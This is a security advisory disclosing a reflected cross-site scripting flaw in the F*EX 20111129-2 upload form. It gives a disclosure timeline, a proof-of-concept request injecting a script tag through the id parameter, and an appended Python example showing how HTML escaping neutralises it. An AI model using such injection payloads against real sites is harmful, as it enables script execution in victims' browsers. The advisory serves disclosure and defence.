title…: F*EX 20111129-2 Cross Site Scripting Vulnerabilities
author…: muuratsalo
contact…: muuratsalo[at]gmail[dot]com
download…: http://fex.rus.uni-stuttgart.de/fex.html
tested on…: Debian wheezy - package fex_20111129-2_all.deb
========================================================================
muuratsalo | muuratsalo experimental hack lab is a proud member of the
Revshell.com community
========================================================================
[0x01] Software overview
FEX (Frams' Fast File EXchange) is a service (GPL software) that lets
users anywhere on the Internet exchange files of ANY size quickly and
conveniently. The sender uploads the file to the FEX-server and the
recipient automatically gets a notification e-mail with a download-URL.
The sender must be a registered user; the recipient does not need to be.
========================================================================
[0x02] Vulnerabilities overview
F*EX 20111129-2 is vulnerable to reflected Cross Site Scripting in the
WWW upload form.
========================================================================
[0x03] Disclosure timeline
[2012-02-01] - Multiple vulnerabilities discovered and reported to the
author of the software.
[2012-02-02] - The author confirmed the vulnerabilities and applied
the suggested fixes.
[2012-02-03] - Further analysis requested.
[2012-02-13] - Very minor security hints applied.
[2012-02-15] - F*EX major update - 20120215
[2012-02-20] - Public disclosure
========================================================================
[0x04] Vulnerability
*** Cross Site Scripting (Reflected) – http://localhost:8888/fup [id
parameter] ***
GET /fup?id=38c66"><script>alert(1)</script>b08f61c45c6&to=%0d&from=%0d HTTP/1.1
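
Added example (not part of the original advisory and not F*EX's own code): the request above replayed against an unescaped and an escaped rendering of the id value, to show why attribute-context output encoding closes the hole. The form markup and all function names are assumptions; the advisory does not show the HTML that fup emits.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Request line copied from section [0x04] of the advisory.
REQUEST_LINE = ('GET /fup?id=38c66"><script>alert(1)</script>b08f61c45c6'
                '&to=%0d&from=%0d HTTP/1.1')

# Assumed markup: the value is reflected into a double-quoted attribute.
FIELD = '<input type="text" name="id" value="%s">'


def query_param(request_line, name):
    """Return the URL-decoded value of one query parameter."""
    _method, rest = request_line.split(" ", 1)
    target, _version = rest.rsplit(" ", 1)
    query = target.partition("?")[2]
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]


def render_unescaped(value):
    """Vulnerable pattern: the raw parameter is pasted into the attribute."""
    return FIELD % value


def render_escaped(value):
    """Hardened pattern: encode &, <, > and both quote characters."""
    return FIELD % html.escape(value, quote=True)


class TagCollector(HTMLParser):
    """Records every start tag, i.e. what a browser would build as elements."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def tags_in(markup):
    """Parse markup and return its start tags as (name, attributes) pairs."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags
```

In the unescaped rendering the parser sees a second element (script) after the input field; in the escaped rendering there is only the input element and its value attribute decodes back to the exact string that was sent.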